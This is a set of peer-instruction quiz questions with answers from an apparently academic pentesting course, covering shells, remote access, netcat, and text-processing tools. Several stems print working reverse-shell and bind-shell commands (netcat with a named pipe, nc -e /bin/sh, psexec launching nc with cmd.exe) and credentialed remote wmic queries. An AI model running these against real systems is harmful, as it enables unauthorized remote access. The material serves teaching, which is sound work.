Penetration Testing & Network Defense

Presentation transcript:

Penetration Testing & Network Defense: Basics/Preliminaries

Peer Instruction Questions for Cybersecurity: Pentesting by William E. Johnson, Allison Luzader, Irfan Ahmed is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.

What is a shell?
A. A program that allows a user to display colorized output, clear and redraw the screen, etc.
B. A program that allows a user to send raw commands (stdin) and get a raw response back (stdout)
C. A program that contains a terminal and is used to provide additional features to the terminal
D. An exploitation mechanism that allows code to inject itself into a running process
E. A program used to encapsulate and isolate a running binary through emulated system calls (such as Wine)
Answer: B
Category: Shell vs. Term

What is a terminal?
A. A program that encapsulates a shell to provide more features such as colorized output and the ability to redraw the screen
B. A program that allows a user to send raw commands (stdin) and get a raw response back (stdout)
C. A program that facilitates remote access between machines
D. A program used to encapsulate and isolate a running binary through emulated system calls (such as Wine)
E. A program that allows remote termination of running processes
Answer: A
Category: Shell vs. Term

What does this pair of commands best accomplish?
    mkfifo pipe
    /bin/sh 0<pipe | nc [pentester IP] 1234 1>pipe
A. Create a local netcat server that serves a bash instance
B. Run a shell script called “pipe” and serve it to a listener on the pentester’s IP
C. Redirect stdin and stdout of a bash instance to a listener on the pentester’s IP
D. Access stdin and stdout of a remotely running bash instance on the local pentester’s IP using a named pipe
Answer: C
Category: Simple proxy

You’ve established remote shell access to a machine with Netcat. Which of these commands will not function?
A. cat /etc/passwd
B. whoami
C. more /etc/passwd
D. hostname
E. id
Answer: C
Category: Shell vs. Term

You’ve established remote shell access to a machine with Netcat. Which of these commands will function?
A. more /etc/passwd
B. vim /etc/passwd
C. cat /etc/passwd
D. less /etc/passwd
E. top /etc/passwd
Answer: C
Category: Shell vs. Term

You need terminal access to a remote machine to make use of a particular application. Assuming the machine has servers for each of these, which of these utilities will best provide that access?
A. Telnet
B. Netcat
C. tsh
D. SSH
E. A or D
Answer: D
Category: Shell vs. Term

What does this command accomplish?
    C:\> for /L %%i in (1,1,255) do sc \\192.168.1.%%i query
A. Attempt to connect with SMB to machines on 192.168.1.0/24 and list their running services in a command line
B. Attempt to connect with SMB to machines on 192.168.1.0/24 and list their open ports in a command line
C. Attempt to connect with SMB to machines on 192.168.1.0/24 and list their running services in a .bat script
D. Attempt to connect with SMB to machines on 192.168.1.0/24 and list their open ports in a .bat script
Answer: C
Maybe this is too much info, but key pieces of information are the variable with two “%%”s indicating this belongs to a script, and sc query queries services.
Category: Remote access

What does this command best accomplish?
    C:\> wmic /node:137.30.126.111 /user:administrator /password:password process list full
A. Send full process information to remote node 137.30.126.111
B. Receive full process information from node 137.30.126.111
C. Receive full process information for processes started by user “administrator” from 137.30.126.111
D. Send full process information for processes started by user “administrator” to 137.30.126.111
Answer: B
Source: https://www.sans.org/security-resources/sec560/windows_command_line_sheet_v1.pdf
Category: Remote access

What does this command accomplish?
    nc -v -w 2 137.30.126.111 750
A. Scan port 750 on 137.30.126.111
B. Open a bind shell on 137.30.126.111 for 750 seconds
C. Access a Netcat listener at 137.30.126.111 on port 750
D. Create a reverse shell and send to a remote listener at 137.30.126.111 on port 750
Answer: A
Category: Port scanning

What does this command accomplish?
    nc -e /bin/sh 137.30.126.111 750
A. Scan port 750 on 137.30.126.111
B. Open a bind shell on 137.30.126.111 for 750 seconds
C. Access a Netcat listener at 137.30.126.111 on port 750
D. Create a reverse shell and send to a remote listener at 137.30.126.111 on port 750
Answer: D
Category: Reverse shell

What does the following command best accomplish?
    C:\> psexec \\137.30.126.111 -u myuser -p mypassword C:\nc.exe -l -p 1234 -e cmd.exe
A. Create a bind shell on the local Windows machine that requires a user login
B. Create a reverse shell on the local Windows machine that automatically logs into 137.30.126.111 to provide the shell
C. Log in to and create a bind shell on 137.30.126.111
D. Log into a reverse shell that was provided to the local machine from 137.30.126.111
Answer: C
Category: Bind shell

You’re running this awk command against text output from a recon framework. What are the results?
    awk -F"," '{print $1, $3, $4}' results.out
A. Insert commas after columns 1, 3, and 4 in the results file
B. Print columns 1, 3, and 4 of a CSV results file
C. Combine columns 1, 3, and 4 of each CSV file in the current directory and print output to results.out
D. Insert commas between columns 1, 3, and 4 and print those to results.out
Answer: B
Category: awk

You’re running this sed command against a plaintext file. What does it accomplish?
    sed 's/,/\ /g' input.txt
A. Add a comma followed by a space between the first two tokens in the file
B. Add a comma followed by a space between each token in the file
C. Replace all spaces with commas in the file
D. Replace the first space with a comma in the file
E. Replace all commas with spaces in the file
Answer: E
Category: sed

What does this command accomplish?
    grep 137.30.120.1 file.txt | sed 's/,/\ /g' | awk '{print $4}' > file_.txt
A. Run awk on file_.txt to isolate the 4th column, replace any extraneous commas with spaces, and only print lines that contain “137.30.120.1”, saving to file.txt
B. Find lines in file.txt that contain “137.30.120.1”, replace all commas with spaces, and then print the 4th column to file_.txt
C. Find file.txt on 137.30.120.1, replace all commas in the file with spaces, and print the fourth column out to file_.txt
D. Isolate the fourth column of file_.txt, replace extraneous commas with spaces, and save it to the found file.txt file on 137.30.120.1
Answer: B
Category: grep, awk, sed

Given a plaintext output file from a port scanner you’ve run, which of these tools will best help you find sections in the file based on some common pattern?
A. sed
B. awk
C. grep
D. bind
E. A and D
Answer: C
Category: grep